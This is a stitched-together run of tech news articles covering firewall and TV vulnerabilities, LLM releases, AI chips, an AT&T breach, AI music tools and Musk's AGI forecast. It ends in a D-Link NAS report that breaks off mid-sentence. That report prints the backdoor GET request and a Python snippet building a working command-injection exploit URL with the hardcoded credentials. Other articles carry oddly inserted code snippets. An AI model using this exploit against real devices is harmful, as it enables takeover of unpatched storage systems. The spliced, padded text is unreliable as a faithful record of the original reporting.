
“Highly capable” hackers root corporate networks by exploiting firewall 0-day

The word ZERO-DAY is hidden amidst a screen filled with ones and zeroes.

Highly capable hackers are rooting multiple corporate networks by exploiting a maximum-severity zero-day vulnerability in a firewall product from Palo Alto Networks, researchers said Friday.

The vulnerability, which has been under active exploitation for at least two weeks now, allows unauthenticated hackers to execute malicious code with root privileges, the highest possible level of system access, researchers said. The extent of the compromise, along with the ease of exploitation, has earned the CVE-2024-3400 vulnerability the maximum severity rating of 10.0. The ongoing attacks are the latest in a rash of attacks aimed at firewalls, VPNs, and file-transfer appliances, which are popular targets because of their wealth of vulnerabilities and their direct pipeline into the most sensitive parts of a network.

“Highly capable” UTA0218 likely to be joined by others

The zero-day is present in PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls when they are configured to use both the GlobalProtect gateway and device telemetry. Palo Alto Networks has yet to patch the vulnerability but is urging affected customers to follow the workaround and mitigation guidance in its advisory. The advice includes enabling Threat ID 95187 for those with subscriptions to the company’s Threat Prevention service and ensuring vulnerability protection has been applied to their GlobalProtect interface. When that’s not possible, customers should temporarily disable telemetry until a patch is available.

Volexity, the security firm that discovered the zero-day attacks, said it’s currently unable to tie the attackers to any previously known groups. However, based on the resources required and the organizations targeted, the attackers are “highly capable” and likely backed by a nation-state. So far, only a single threat group—which Volexity tracks as UTA0218—is known to be leveraging the vulnerability in limited attacks. The company warned that as new groups learn of the vulnerability, CVE-2024-3400 is likely to come under mass exploitation, just as zero-days affecting products from the likes of Ivanti, Atlassian, Citrix, and Progress have in recent months.

“As with previous public disclosures of vulnerabilities in these kinds of devices, Volexity assesses that it is likely a spike in exploitation will be observed over the next few days by UTA0218 and potentially other threat actors who may develop exploits for this vulnerability,” company researchers wrote Friday. “This spike in activity will be driven by the urgency of this window of access closing due to mitigations and patches being deployed. It is therefore imperative that organizations act quickly to deploy recommended mitigations and perform compromise reviews of their devices to check whether further internal investigation of their networks is required.”

The earliest attacks Volexity has seen took place on March 26 in what company researchers suspect was UTA0218 testing the vulnerability by placing zero-byte files on firewall devices to validate exploitability. On April 7, the researchers observed the group trying unsuccessfully to install a backdoor on a customer’s firewall. Three days later, the group’s attacks were successfully deploying malicious payloads. Since then, the threat group has deployed custom, never-before-seen post-exploitation malware. The backdoor, which is written in the Python language, allows the attackers to use specially crafted network requests to execute additional commands on hacked devices.



Words are flowing out like endless rain: Recapping a busy week of LLM news

many things frequently —

Gemini 1.5 Pro launch, new version of GPT-4 Turbo, new Mistral model, and more.

An image of a boy amazed by flying letters.

Some weeks in AI news are eerily quiet, but during others, getting a grip on the week’s events feels like trying to hold back the tide. This week has seen three notable large language model (LLM) releases: Google Gemini Pro 1.5 hit general availability with a free tier, OpenAI shipped a new version of GPT-4 Turbo, and Mistral released a new openly licensed LLM, Mixtral 8x22B. All three of those launches happened within 24 hours starting on Tuesday.

With the help of software engineer and independent AI researcher Simon Willison (who also wrote about this week’s hectic LLM launches on his own blog), we’ll briefly cover each of the three major events in roughly chronological order, then dig into some additional AI happenings this week.

Gemini Pro 1.5 general release

On Tuesday morning Pacific time, Google announced that its Gemini 1.5 Pro model (which we first covered in February) is now available in 180-plus countries, excluding Europe, via the Gemini API in a public preview. This is Google’s most powerful public LLM so far, and it’s available in a free tier that permits up to 50 requests a day.

It supports up to 1 million tokens of input context. As Willison notes on his blog, Gemini 1.5 Pro’s API pricing of $7/million input tokens and $21/million output tokens comes in a little below GPT-4 Turbo (priced at $10/million in and $30/million out) and above Claude 3 Sonnet (Anthropic’s mid-tier LLM, priced at $3/million in and $15/million out).
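
To make the per-token prices above concrete, here’s a small sketch comparing what a single large-context request would cost at the quoted rates (the model names here are informal labels for this example, not official API identifiers):

```python
# Per-million-token prices quoted above: (input $/M, output $/M).
PRICES = {
    "gemini-1.5-pro": (7.0, 21.0),
    "gpt-4-turbo": (10.0, 30.0),
    "claude-3-sonnet": (3.0, 15.0),
}

def request_cost(model: str, input_tokens: int, output_tokens: int) -> float:
    """Dollar cost of one API call at the listed rates."""
    in_rate, out_rate = PRICES[model]
    return (input_tokens * in_rate + output_tokens * out_rate) / 1_000_000

# Example: a 100,000-token input (a tenth of Gemini's 1M-token window)
# with a 2,000-token reply.
for model in PRICES:
    print(model, round(request_cost(model, 100_000, 2_000), 3))
```

At that request size, the input tokens dominate the bill, which is why the per-input-token rate matters most for long-context use.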

Notably, Gemini 1.5 Pro includes native audio (speech) input processing that allows users to upload audio or video prompts, a new File API for handling files, the ability to add custom system instructions (system prompts) for guiding model responses, and a JSON mode for structured data extraction.

“Majorly Improved” GPT-4 Turbo launch

A GPT-4 Turbo performance chart provided by OpenAI.

Shortly after Google’s 1.5 Pro launch on Tuesday, OpenAI announced that it was rolling out a “majorly improved” version of GPT-4 Turbo (a model family originally launched in November) called “gpt-4-turbo-2024-04-09.” It integrates multimodal GPT-4 Vision processing (recognizing the contents of images) directly into the model, and it initially launched through API access only.

Then on Thursday, OpenAI announced that the new GPT-4 Turbo model had just become available for paid ChatGPT users. OpenAI said that the new model improves “capabilities in writing, math, logical reasoning, and coding” and shared a chart that is not particularly useful in judging capabilities (that they later updated). The company also provided an example of an alleged improvement, saying that when writing with ChatGPT, the AI assistant will use “more direct, less verbose, and use more conversational language.”

The vague nature of OpenAI’s GPT-4 Turbo announcements attracted some confusion and criticism online. On X, Willison wrote, “Who will be the first LLM provider to publish genuinely useful release notes?” In some ways, this is a case of “AI vibes” again, as we discussed in our lament about the poor state of LLM benchmarks during the debut of Claude 3. “I’ve not actually spotted any definite differences in quality [related to GPT-4 Turbo],” Willison told us directly in an interview.

The update also expanded GPT-4’s knowledge cutoff to April 2024, although some people are reporting it achieves this through stealth web searches in the background, and others on social media have reported issues with date-related confabulations.

Mistral’s mysterious Mixtral 8x22B release

An illustration of a robot holding a French flag, figuratively reflecting the rise of AI in France due to Mistral. It’s hard to draw a picture of an LLM, so a robot will have to do.

Not to be outdone, on Tuesday night, French AI company Mistral launched its latest openly licensed model, Mixtral 8x22B, by tweeting a torrent link devoid of any documentation or commentary, much like it has done with previous releases.

The new mixture-of-experts (MoE) release weighs in with a larger parameter count than Mixtral 8x7B, previously the company’s most capable open model, which we covered in December. It’s rumored to be as capable as GPT-4 (in what way, you ask? Vibes), but that remains to be seen.

“The evals are still rolling in, but the biggest open question right now is how well Mixtral 8x22B shapes up,” Willison told Ars. “If it’s in the same quality class as GPT-4 and Claude 3 Opus, then we will finally have an openly licensed model that’s not significantly behind the best proprietary ones.”

This release has Willison most excited, saying, “If that thing really is GPT-4 class, it’s wild, because you can run that on a (very expensive) laptop. I think you need 128GB of MacBook RAM for it, twice what I have.”
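
Willison’s 128GB figure can be sanity-checked with back-of-the-envelope math. A sketch assuming a total parameter count of about 141 billion (a community-reported figure for Mixtral 8x22B, not confirmed by Mistral):

```python
def weight_memory_gb(params_billion: float, bits_per_weight: int) -> float:
    """Approximate memory for model weights alone (ignores KV cache
    and runtime overhead)."""
    return params_billion * 1e9 * bits_per_weight / 8 / 1e9

# Assuming ~141B total parameters (an unconfirmed, community-reported figure):
print(weight_memory_gb(141, 16))  # 16-bit weights: 282 GB, far too big
print(weight_memory_gb(141, 4))   # 4-bit quantized: 70.5 GB
```

At 4-bit quantization the weights alone would fit in a 128GB machine with headroom for activations, which is consistent with Willison’s estimate.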

The new Mixtral is not yet listed on Chatbot Arena, Willison noted, because Mistral has not released a fine-tuned version for chat; it’s still a raw, predict-the-next-token LLM. “There’s at least one community instruction tuned version floating around now though,” says Willison.

Chatbot Arena Leaderboard shake-ups

A Chatbot Arena Leaderboard screenshot taken on April 12, 2024.

Benj Edwards

This week’s LLM news isn’t limited to just the big names in the field. There have also been rumblings on social media about the rising performance of open-weights models like Cohere’s Command R+, which reached position 6 on the LMSYS Chatbot Arena Leaderboard—the highest-ever ranking for an open-weights model.

And for even more Chatbot Arena action, apparently the new version of GPT-4 Turbo is proving competitive with Claude 3 Opus. The two are still in a statistical tie, but GPT-4 Turbo recently pulled ahead numerically. (In March, we reported when Claude 3 first numerically pulled ahead of GPT-4 Turbo, which was then the first time another AI model had surpassed a GPT-4 family model member on the leaderboard.)
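
Chatbot Arena ranks models with an Elo-style rating (fit from head-to-head user votes), so a “statistical tie” means the numerical gap translates to a near-coin-flip expected win rate. A quick sketch, using illustrative ratings rather than the leaderboard’s actual numbers:

```python
def elo_win_probability(rating_a: float, rating_b: float) -> float:
    """Expected win rate of model A over model B under the Elo model."""
    return 1 / (1 + 10 ** ((rating_b - rating_a) / 400))

# A few-point lead (e.g., 1255 vs. 1250, hypothetical numbers) is barely
# better than a coin flip:
print(round(elo_win_probability(1255, 1250), 3))  # ~0.507
```

This is why "pulled ahead numerically" and "statistically tied" can both be true at once: a five-point gap implies only about a 50.7 percent expected win rate.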

Regarding this fierce competition among LLMs—of which most of the muggle world is unaware and will likely never be—Willison told Ars, “The past two months have been a whirlwind—we finally have not just one but several models that are competitive with GPT-4.” We’ll see whether OpenAI’s rumored release of GPT-5 later this year restores the company’s technological lead, which once seemed insurmountable. But for now, Willison says, “OpenAI are no longer the undisputed leaders in LLMs.”



Intel’s “Gaudi 3” AI accelerator chip may give Nvidia’s H100 a run for its money

Adventures in Matrix Multiplication —

Intel claims 50% more speed when running AI language models vs. the market leader.

An Intel handout photo of the Gaudi 3 AI accelerator.

On Tuesday, Intel revealed a new AI accelerator chip called Gaudi 3 at its Vision 2024 event in Phoenix. With strong claimed performance while running large language models (like those that power ChatGPT), the company has positioned Gaudi 3 as an alternative to Nvidia’s H100, a popular data center GPU that has been subject to shortages, though apparently that is easing somewhat.

Compared to Nvidia’s H100 chip, Intel projects a 50 percent faster training time on Gaudi 3 for both OpenAI’s GPT-3 175B LLM and the 7-billion parameter version of Meta’s Llama 2. In terms of inference (running the trained model to get outputs), Intel claims that its new AI chip delivers 50 percent faster performance than H100 for Llama 2 and Falcon 180B, which are both relatively popular open-weights models.
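
A side note on reading vendor speedup claims: “50 percent faster” usually means 1.5× throughput, which cuts runtime by a third, not by half. A quick bit of our own arithmetic (Intel’s slide does not spell out which reading it intends) under the throughput interpretation:

```python
def time_ratio(percent_faster: float) -> float:
    """If chip A is `percent_faster`% faster than chip B in throughput,
    A finishes the same job in this fraction of B's time."""
    return 1 / (1 + percent_faster / 100)

print(round(time_ratio(50), 3))  # 0.667: a 50% speedup trims runtime by a third
```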

Intel is targeting the H100 because of its high market share, but the H100 isn’t Nvidia’s most powerful AI accelerator in the pipeline. The since-announced H200 and Blackwell B200 surpass the H100 on paper, but neither of those chips is out yet (the H200 is expected in the second quarter of 2024—basically any day now).

Meanwhile, the aforementioned H100 supply issues have been a major headache for tech companies and AI researchers who have to fight for access to any chips that can train AI models. This has led several tech companies like Microsoft, Meta, and OpenAI (rumor has it) to seek their own AI-accelerator chip designs, although that custom silicon is typically manufactured by either Intel or TSMC. Google has its own line of tensor processing units (TPUs) that it has been using internally since 2015.

Given those issues, Intel’s Gaudi 3 may be an attractive alternative to the H100 if Intel can hit an ideal price (which Intel has not provided, but an H100 reportedly costs around $30,000–$40,000) and maintain adequate production. AMD also manufactures a competitive range of AI chips, such as the AMD Instinct MI300 series, which sell for around $10,000–$15,000.

Gaudi 3 performance

An Intel handout featuring specifications of the Gaudi 3 AI accelerator.

Intel says the new chip builds upon the architecture of its predecessor, Gaudi 2, by featuring two identical silicon dies connected by a high-bandwidth connection. Each die contains a central cache memory of 48 megabytes, surrounded by four matrix multiplication engines and 32 programmable tensor processor cores, bringing the total cores to 64.
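
The per-die figures above imply the chip-level totals Intel quotes; a trivial tally:

```python
# Per-die resources as described above; Gaudi 3 pairs two identical dies.
DIE = {"cache_mb": 48, "matrix_engines": 4, "tensor_cores": 32}
NUM_DIES = 2

totals = {name: count * NUM_DIES for name, count in DIE.items()}
print(totals)  # {'cache_mb': 96, 'matrix_engines': 8, 'tensor_cores': 64}
```

Doubling each per-die figure yields the 64 tensor cores Intel cites, along with 8 matrix engines and 96MB of on-chip cache across the package.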

The chipmaking giant claims that Gaudi 3 delivers double the AI compute performance of Gaudi 2 when using the 8-bit floating-point (FP8) format, which has become crucial for training transformer models. The chip also offers a fourfold boost for computations using the BFloat16 number format. Gaudi 3 also features 128GB of the less expensive HBM2e memory (which may contribute to price competitiveness) and 3.7TB/s of memory bandwidth.

Since data centers are well-known to be power hungry, Intel emphasizes the power efficiency of Gaudi 3, claiming 40 percent greater inference power efficiency than Nvidia’s H100 across Llama 2 7B and 70B and Falcon 180B models. Eitan Medina, chief operating officer of Intel’s Habana Labs, attributes this advantage to Gaudi’s large-matrix math engines, which he claims require significantly less memory bandwidth than other architectures.

Gaudi vs. Blackwell

An Intel handout photo of the Gaudi 3 AI accelerator.

Last month, we covered the splashy launch of Nvidia’s Blackwell architecture, including the B200 GPU, which Nvidia claims will be the world’s most powerful AI chip. It seems natural, then, to compare what we know about Nvidia’s highest-performing AI chip to the best of what Intel can currently produce.

For starters, Gaudi 3 is being manufactured using TSMC’s N5 process technology, according to IEEE Spectrum, narrowing the gap between Intel and Nvidia in terms of semiconductor fabrication technology. The upcoming Nvidia Blackwell chip will use a custom N4P process, which reportedly offers modest performance and efficiency improvements over N5.

Gaudi 3’s use of HBM2e memory (as we mentioned above) is notable compared to the more expensive HBM3 or HBM3e used in competing chips, offering a balance of performance and cost-efficiency. This choice seems to emphasize Intel’s strategy to compete not only on performance but also on price.

As for raw performance comparisons between Gaudi 3 and the B200, those can’t be made until both chips have been released and benchmarked by third parties.

As the race to power the tech industry’s thirst for AI computation heats up, IEEE Spectrum notes that the next generation of Intel’s Gaudi chip, code-named Falcon Shores, remains a point of interest. It also remains to be seen whether Intel will continue to rely on TSMC’s technology or leverage its own foundry business and upcoming nanosheet transistor technology to gain a competitive edge in the AI accelerator market.



AT&T: Data breach affects 73 million or 51 million customers. No, we won’t explain.

“SECURITY IS IMPORTANT TO US” —

When the data was published in 2021, the company said it didn’t belong to its customers.

Getty Images

AT&T is notifying millions of current and former customers that their account data was compromised and published last month on the dark web. Just how many millions, the company isn’t saying.

In a mandatory filing with the Maine Attorney General’s office, the telecommunications company said 51.2 million account holders were affected. On its corporate website, AT&T put the number at 73 million. In either event, compromised data included one or more of the following: full names, email addresses, mailing addresses, phone numbers, Social Security numbers, dates of birth, AT&T account numbers, and AT&T passcodes. Personal financial information and call history didn’t appear to be included, AT&T said, and the data appeared to be from June 2019 or earlier.

The disclosure on the AT&T site said the 73 million affected customers comprised 7.6 million current customers and 65.4 million former customers. The notification said AT&T has reset the account PINs of all current customers and is notifying current and former customers by mail. AT&T representatives haven’t explained why the letter filed with the Maine AG lists 51.2 million affected and the disclosure on its site lists 73 million.

According to a March 30 article published by TechCrunch, a security researcher said the passcodes were stored in an encrypted format that could easily be decrypted. Bleeping Computer reported in 2021 that more than 70 million records containing AT&T customer data were put up for sale that year for $1 million. AT&T, at the time, told the news site that the amassed data didn’t belong to its customers and that the company’s systems had not been breached.

Last month, after the same data reappeared online, Bleeping Computer and TechCrunch confirmed that the data belonged to AT&T customers, and the company finally acknowledged the connection. AT&T has yet to say how the information was breached or why it took more than two years from the original date of publication to confirm that it belonged to its customers.

Given the length of time the data has been available, the damage resulting from the most recent publication is likely to be minimal. That said, anyone who is or was an AT&T customer should be on the lookout for scams that attempt to capitalize on the leaked data. AT&T is offering one year of free identity theft protection.



New AI music generator Udio synthesizes realistic music on demand

Battle of the AI bands —

But it still needs trial and error to generate high-quality results.

A screenshot of AI-generated songs listed on Udio on April 10, 2024.

Benj Edwards

Between 2002 and 2005, I ran a music website where visitors could submit song titles that I would write and record a silly song around. In the liner notes for my first CD release in 2003, I wrote about a day when computers would potentially put me out of business, churning out music automatically at a pace I could not match. While I don’t actively post music on that site anymore, that day is almost here.

On Wednesday, a group of ex-DeepMind employees launched Udio, a new AI music synthesis service that can create novel high-fidelity musical audio from written prompts, including user-provided lyrics. It’s similar to Suno, which we covered on Monday. With some key human input, Udio can create facsimiles of human-produced music in genres like country, barbershop quartet, German pop, classical, hard rock, hip hop, show tunes, and more. It’s currently free to use during a beta period.

Udio is also freaking out some musicians on Reddit. As we mentioned in our Suno piece, Udio is exactly the kind of AI-powered music generation service that over 200 musical artists were afraid of when they signed an open protest letter last week.

But as impressive as Udio’s songs first seem from a technical AI-generation standpoint (not necessarily judging by musical merit), the service’s generation capability isn’t perfect. We experimented with its creation tool, and the results felt less impressive than those created by Suno. The high-quality musical samples showcased on Udio’s site likely resulted from a lot of creative human input (such as human-written lyrics) and cherry-picking the best compositional parts of songs out of many generations. In fact, Udio lays out a five-step workflow for building a 1.5-minute-long song in its FAQ.

For example, we created an Ars Technica “Moonshark” song on Udio using the same prompt we previously used with Suno. In its raw form, the result sounds half-baked and almost nightmarish (here is the Suno version for comparison). It’s also much shorter by default at 32 seconds, compared to Suno’s 1-minute-and-32-second output. But Udio allows songs to be extended, or you can regenerate a poor result with different prompts.

After registering a Udio account, anyone can create a track by entering a text prompt that can include lyrics, a story direction, and musical genre tags. Udio then tackles the task in two stages. First, it utilizes a large language model (LLM) similar to ChatGPT to generate lyrics (if necessary) based on the provided prompt. Next, it synthesizes music using a method that Udio does not disclose, but it’s likely a diffusion model, similar to Stability AI’s Stable Audio.

From the given prompt, Udio’s AI model generates two distinct song snippets for you to choose from. You can then publish the song for the Udio community, download the audio or video file to share on other platforms, or directly share it on social media. Other Udio users can also remix or build on existing songs. Udio’s terms of service say that the company claims no rights over the musical generations and that they can be used for commercial purposes.

Although the Udio team has not revealed the specific details of its model or training data (which is likely filled with copyrighted material), it told Tom’s Guide that the system has built-in measures to identify and block tracks that too closely resemble the work of specific artists, ensuring that the generated music remains original.

And that brings us back to humans, some of whom are not taking the onset of AI-generated music very well. “I gotta be honest, this is depressing as hell,” wrote one Reddit commenter in a thread about Udio. “I’m still broadly optimistic that music will be fine in the long run somehow. But like, why do this? Why automate art?”

We’ll hazard an answer by saying that replicating art is a key target for AI research because the results can be inaccurate and imprecise and still seem notable or gee-whiz amazing, which is a key characteristic of generative AI. It’s flashy and impressive-looking while allowing for a general lack of quantitative rigor. We’ve already seen AI come for still images, video, and text with varied results regarding representative accuracy. Fully composed musical recordings seem to be next on the list of AI hills to (approximately) conquer, and the competition is heating up.



Thousands of LG TVs are vulnerable to takeover—here’s how to ensure yours isn’t one

Getty Images

As many as 91,000 LG TVs face the risk of being commandeered unless they receive a just-released security update patching four critical vulnerabilities discovered late last year.

The vulnerabilities are found in four LG TV models that collectively comprise slightly more than 88,000 units around the world, according to results returned by the Shodan search engine for Internet-connected devices. The vast majority of those units are located in South Korea, followed by Hong Kong, the US, Sweden, and Finland. The models are:

  • LG43UM7000PLA running webOS 4.9.7 – 5.30.40
  • OLED55CXPUA running webOS 5.5.0 – 04.50.51
  • OLED48C1PUB running webOS 6.3.3-442 (kisscurl-kinglake) – 03.36.50
  • OLED55A23LA running webOS 7.3.1-43 (mullet-mebin) – 03.33.85

Starting Wednesday, updates are available through these devices’ settings menu.

Got root?

According to Bitdefender—the security firm that discovered the vulnerabilities—malicious hackers can exploit them to gain root access to the devices and inject commands that run at the OS level. The vulnerabilities, which affect internal services that allow users to control their sets using their phones, make it possible for attackers to bypass authentication measures designed to ensure only authorized devices can make use of the capabilities.

“These vulnerabilities let us gain root access on the TV after bypassing the authorization mechanism,” Bitdefender researchers wrote Tuesday. “Although the vulnerable service is intended for LAN access only, Shodan, the search engine for Internet-connected devices, identified over 91,000 devices that expose this service to the Internet.”

The key vulnerability making these threats possible resides in a service that allows TVs to be controlled using LG’s ThinQ smartphone app when it’s connected to the same local network. The service is designed to require the user to enter a PIN code to prove authorization, but an error allows someone to skip this verification step and become a privileged user. This vulnerability is tracked as CVE-2023-6317.

Once attackers have gained this level of control, they can go on to exploit three other vulnerabilities, specifically:

  • CVE-2023-6318, which allows the attackers to elevate their access to root
  • CVE-2023-6319, which allows for the injection of OS commands by manipulating a library for showing music lyrics
  • CVE-2023-6320, which lets an attacker inject authenticated commands by manipulating the com.webos.service.connectionmanager/tv/setVlanStaticAddress application interface.



Elon Musk: AI will be smarter than any human around the end of next year

smarter than the average bear —

While Musk says superintelligence is coming soon, one critic says prediction is “batsh*t crazy.”

Elon Musk, owner of Tesla and the X (formerly Twitter) platform, on January 22, 2024.

On Monday, Tesla CEO Elon Musk predicted the imminent rise in AI superintelligence during a live interview streamed on the social media platform X. “My guess is we’ll have AI smarter than any one human probably around the end of next year,” Musk said in his conversation with hedge fund manager Nicolai Tangen.

Just prior to that, Tangen had asked Musk, “What’s your take on where we are in the AI race just now?” Musk told Tangen that AI “is the fastest advancing technology I’ve seen of any kind, and I’ve seen a lot of technology.” He described computers dedicated to AI increasing in capability by “a factor of 10 every year, if not every six to nine months.”
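
Musk’s “factor of 10 every year, if not every six to nine months” compounds dramatically; a quick bit of arithmetic shows what each period implies annually:

```python
def annual_factor(per_period_factor: float, period_months: float) -> float:
    """Annualized growth if capability multiplies by `per_period_factor`
    every `period_months` months."""
    return per_period_factor ** (12 / period_months)

for months in (12, 9, 6):
    print(f"10x every {months} months = {annual_factor(10, months):.1f}x per year")
```

A 10× jump every six months is 100× per year, so the gap between the low and high ends of Musk’s claim is itself an order of magnitude.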

Musk made the prediction with an asterisk, saying that shortages of AI chips and high AI power demands could limit AI’s capability until those issues are resolved. “Last year, it was chip-constrained,” Musk told Tangen. “People could not get enough Nvidia chips. This year, it’s transitioning to a voltage transformer supply. In a year or two, it’s just electricity supply.”

But not everyone is convinced that Musk’s crystal ball is free of cracks. Grady Booch, a frequent critic of AI hype on social media who is perhaps best known for his work in software architecture, told Ars in an interview, “Keep in mind that Mr. Musk has a profoundly bad record at predicting anything associated with AI; back in 2016, he promised his cars would ship with FSD safety level 5, and here we are, closing in on a decade later, still waiting.”

Creating artificial intelligence at least as smart as a human (frequently called “AGI” for artificial general intelligence) is often seen as inevitable among AI proponents, but there’s no broad consensus on exactly when that milestone will be reached—or on the exact definition of AGI, for that matter.

“If you define AGI as smarter than the smartest human, I think it’s probably next year, within two years,” Musk added in the interview with Tangen while discussing AGI timelines.

Even with uncertainties about AGI, that hasn’t kept companies from trying. ChatGPT creator OpenAI, which launched with Musk as a co-founder in 2015, lists developing AGI as its main goal. Musk has not been directly associated with OpenAI for years (unless you count a recent lawsuit against the company), but last year, he took aim at the business of large language models by forming a new company called xAI. Its main product, Grok, functions similarly to ChatGPT and is integrated into the X social media platform.

Booch gives credit to Musk’s business successes but casts doubt on his forecasting ability. “Albeit a brilliant if not rapacious businessman, Mr. Musk vastly overestimates both the history as well as the present of AI while simultaneously diminishing the exquisite uniqueness of human intelligence,” says Booch. “So in short, his prediction is—to put it in scientific terms—batshit crazy.”

So when will we get AI that’s smarter than a human? Booch says there’s no real way to know at the moment. “I reject the framing of any question that asks when AI will surpass humans in intelligence because it is a question filled with ambiguous terms and considerable emotional and historic baggage,” he says. “We are a long, long way from understanding the design that would lead us there.”

We also asked Hugging Face AI researcher Dr. Margaret Mitchell to weigh in on Musk’s prediction. “Intelligence … is not a single value where you can make these direct comparisons and have them mean something,” she told us in an interview. “There will likely never be agreement on comparisons between human and machine intelligence.”

But even with that uncertainty, she feels there is one aspect of AI she can more reliably predict: “I do agree that neural network models will reach a point where men in positions of power and influence, particularly ones with investments in AI, will declare that AI is smarter than humans. By end of next year, sure. That doesn’t sound far off base to me.”


mit-license-text-becomes-viral-“sad-girl”-piano-ballad-generated-by-ai

MIT License text becomes viral “sad girl” piano ballad generated by AI

WARRANTIES OF MERCHANTABILITY —

“Permission is hereby granted” comes from the Suno AI engine that creates new songs on demand.

Illustration of a robot singing.

We’ve come a long way since primitive AI music generators in 2022. Today, AI tools like Suno.ai allow any series of words to become song lyrics, including inside jokes (as you’ll see below). On Wednesday, prompt engineer Riley Goodside tweeted an AI-generated song created with the prompt “sad girl with piano performs the text of the MIT License,” and it began to circulate widely in the AI community online.

The MIT License is a famous permissive software license created in the late 1980s, frequently used in open source projects. “My favorite part of this is ~1:25 it nails ‘WARRANTIES OF MERCHANTABILITY’ with a beautiful Imogen Heap-style glissando then immediately pronounces ‘FITNESS’ as ‘fistiff,'” Goodside wrote on X.

Suno (which means “listen” in Hindi) was formed in 2023 in Cambridge, Massachusetts. It’s the brainchild of Michael Shulman, Georg Kucsko, Martin Camacho, and Keenan Freyberg, who formerly worked at companies like Meta and TikTok. Suno has already attracted big-name partners, such as Microsoft, which announced the integration of an earlier version of the Suno engine into Bing Chat last December. Today, Suno is on v3 of its model, which can create temporally coherent two-minute songs in many different genres.

The company did not reply to our request for an interview by press time. In March, Brian Hiatt of Rolling Stone wrote a profile about Suno that describes the service as a collaboration between OpenAI’s ChatGPT (for lyric writing) and Suno’s music generation model, which some experts think has likely been trained on recordings of copyrighted music without license or artist permission.

It’s exactly this kind of service that upset over 200 musical artists enough last week that they signed an Artist Rights Alliance open letter asking tech companies to stop using AI tools to generate music that could replace human artists.

Considering the unknown provenance of the training data, ownership of the generated songs seems like a complicated question. Suno’s FAQ says that music generated using its free tier remains owned by Suno and can only be used for non-commercial purposes. Paying subscribers reportedly own generated songs “while subscribed to Pro or Premier,” subject to Suno’s terms of service. However, the US Copyright Office took a stance last year that purely AI-generated visual art cannot be copyrighted, and while that standard has not yet been resolved for AI-generated music, it might eventually become official legal policy as well.

The Moonshark song

A screenshot of the Suno.ai website showing lyrics of an AI-generated “Moonshark” song.

Benj Edwards

While using the service, we found Suno has no trouble creating unique lyrics based on your prompt (unless you supply your own) and setting those words to stylized genres of music it generates based on its training dataset. It dynamically generates vocals as well, although they include audible aberrations. Suno’s output is not yet indistinguishable from high-fidelity human-created music, but given the pace of progress we’ve seen, that bridge could be crossed within the next year.

To get a sense of what Suno can do, we created an account on the site and prompted the AI engine to create songs about our mascot, Moonshark, and about barbarians with CRTs, two inside jokes at Ars. What’s interesting is that although the AI model aced the task of creating an original song for each topic, both songs start with the same line, “In the depths of the digital domain.” That’s possibly an artifact of whatever hidden prompt Suno is using to instruct ChatGPT when writing the lyrics.

Suno is arguably a fun toy to experiment with and doubtless a milestone in generative AI music tools. But it’s also an achievement tainted by the unresolved ethical issues related to scraping musical work without the artist’s permission. Then there’s the issue of potentially replacing human musicians, which has not been far from the minds of people sharing their own Suno results online. On Monday, AI influencer Ethan Mollick wrote, “I’ve had a song from Suno AI stuck in my head all day. Grim milestone or good one?”


critical-takeover-vulnerabilities-in-92,000-d-link-devices-under-active-exploitation

Critical takeover vulnerabilities in 92,000 D-Link devices under active exploitation

JUST ADD GET REQUEST —

D-Link won’t be patching vulnerable NAS devices because they’re no longer supported.

Photograph depicts a security scanner extracting virus from a string of binary code.

Getty Images

Hackers are actively exploiting a pair of recently discovered vulnerabilities to remotely commandeer network-attached storage devices manufactured by D-Link, researchers said Monday.

Roughly 92,000 devices are vulnerable to the takeover exploits, which can be delivered remotely by sending malicious commands through simple HTTP traffic. The vulnerabilities came to light two weeks ago. The researcher who found them said they were making the threat public because D-Link said it had no plans to patch the flaws, which are present only in end-of-life devices no longer supported by the manufacturer.

An ideal recipe

On Monday, researchers said their sensors began detecting active attempts to exploit the vulnerabilities starting over the weekend. Greynoise, one of the organizations reporting the in-the-wild exploitation, said in an email that the activity began around 02:17 UTC on Sunday. The attacks attempted to download and install one of several pieces of malware on vulnerable devices depending on their specific hardware profile. One such piece of malware is flagged under various names by 40 endpoint protection services.

Security organization Shadowserver has also reported seeing scanning or exploits from multiple IP addresses but didn’t provide additional details.

The vulnerability pair, found in the nas_sharing.cgi programming interface of the vulnerable devices, provides an ideal recipe for remote takeover. The first, tracked as CVE-2024-3272 and carrying a severity rating of 9.8 out of 10, is a backdoor account enabled by credentials hardcoded into the firmware. The second, a command-injection flaw tracked as CVE-2024-3273 with a severity rating of 7.3, can be remotely activated with a simple HTTP GET request.

Netsecfish, the researcher who disclosed the vulnerabilities, demonstrated how a hacker could remotely commandeer vulnerable devices by sending a simple set of HTTP requests to them. The code looks like this:

GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=

In the exploit example, the request carries the hardcoded credentials—username messagebus and an empty password field—followed by a malicious command string that has been base64 encoded.
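As a rough illustration of how such a request is assembled—a hedged sketch, not the advisory's exact proof of concept; the target host and command below are placeholders:

```python
import base64
import urllib.parse

target = "192.0.2.10"   # placeholder NAS address (TEST-NET range), not a real device
command = "id"          # arbitrary shell command; the CGI base64-decodes and runs it

encoded = base64.b64encode(command.encode()).decode()

# CVE-2024-3272: hardcoded backdoor account (user "messagebus", empty password)
# CVE-2024-3273: command injection via the base64-decoded "system" parameter
params = urllib.parse.urlencode({
    "user": "messagebus",
    "passwd": "",
    "cmd": 15,
    "system": encoded,
})
url = f"http://{target}/cgi-bin/nas_sharing.cgi?{params}"
print(url)
```

No authentication step is required at any point, which is what pushes the combined severity so high: the hardcoded account satisfies the login check, and the encoded command runs with the CGI's privileges.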


“Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the system, potentially leading to unauthorized access to sensitive information, modification of system configurations, or denial of service conditions,” netsecfish wrote.

Last week, D-Link published an advisory confirming the list of affected devices:

Model | Region | Hardware Revision | End of Service Life | Fixed Firmware | Conclusion | Last Updated
DNS-320L | All Regions | All H/W Revisions | 05/31/2020 | Not Available | Retire & Replace Device | 04/01/2024
DNS-325 | All Regions | All H/W Revisions | 09/01/2017 | Not Available | Retire & Replace Device | 04/01/2024
DNS-327L | All Regions | All H/W Revisions | 05/31/2020 | Not Available | Retire & Replace Device | 04/01/2024
DNS-340L | All Regions | All H/W Revisions | 07/31/2019 | Not Available | Retire & Replace Device | 04/01/2024

According to netsecfish, Internet scans found roughly 92,000 devices that were vulnerable.


According to the Greynoise email, exploits company researchers are seeing look like this:

